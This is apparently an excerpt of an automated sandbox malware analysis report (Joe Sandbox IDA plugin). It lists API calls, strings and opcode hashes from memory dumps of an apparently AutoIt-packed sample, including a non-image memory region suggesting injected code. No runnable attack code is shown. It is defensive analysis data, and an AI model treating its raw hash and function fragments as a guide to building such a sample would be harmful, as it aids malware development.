                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                              • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                              • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                              • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                              APIs
                                                                                • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                              • _free.LIBCMT ref: 004696A2
                                                                              • _free.LIBCMT ref: 004696A9
                                                                              • _free.LIBCMT ref: 00469714
                                                                                • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                              • _free.LIBCMT ref: 0046971C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                              • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                              • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                              • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                              APIs
                                                                              • SetFilePointerEx.KERNEL32 ref: 02F1B2BA
                                                                              • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 02F1B2E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: File$PointerWrite
                                                                              • String ID:
                                                                              • API String ID: 539440098-0
                                                                              • Opcode ID: 1e4662a94413fe13f63f89b65bfccb37ae8c25469bc644a4bea468a047790219
                                                                              • Instruction ID: dbb95921b3cc63e508280bcadbda642e3554b7e12be1b08902a80b80d431c288
                                                                              • Opcode Fuzzy Hash: 1e4662a94413fe13f63f89b65bfccb37ae8c25469bc644a4bea468a047790219
                                                                              • Instruction Fuzzy Hash: D831C47190C384DEE7129B25C81872FBFE06F8669CFC8858DF6D486281D3B98418DB53
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID: AU3!P/I$EA06
                                                                              • API String ID: 4104443479-1914660620
                                                                              • Opcode ID: 9495628fedda3bd1ad7133e74fd0af6151b2483e3da426c07c75e57f76189fa4
                                                                              • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                              • Opcode Fuzzy Hash: 9495628fedda3bd1ad7133e74fd0af6151b2483e3da426c07c75e57f76189fa4
                                                                              • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0043EA39
                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                              • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                              • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                              • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                              • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                              • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                              • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                              • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                              • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                              • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID:
                                                                              • API String ID: 3545744682-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00404370
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$_memset
                                                                              • String ID:
                                                                              • API String ID: 1505330794-0
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                              • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                              • RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                              • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                              • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00468D1B
                                                                                • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                              • _free.LIBCMT ref: 00468D2C
                                                                              • _free.LIBCMT ref: 00468D3E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CALL
                                                                              • API String ID: 0-4196123274
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,02F155C0,?,00000000,00000000), ref: 02F15A51
                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 02F15B11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreateExitUser
                                                                              • String ID:
                                                                              • API String ID: 4108186749-0
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 00404834
                                                                                • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 1438897964-0
                                                                              APIs
                                                                                • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                              • std::exception::exception.LIBCMT ref: 00420DEC
                                                                              • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                              • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                              • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                              • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                              APIs
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                              • __lock_file.LIBCMT ref: 004253EB
                                                                                • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                              • __fclose_nolock.LIBCMT ref: 004253F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                              • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                              • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
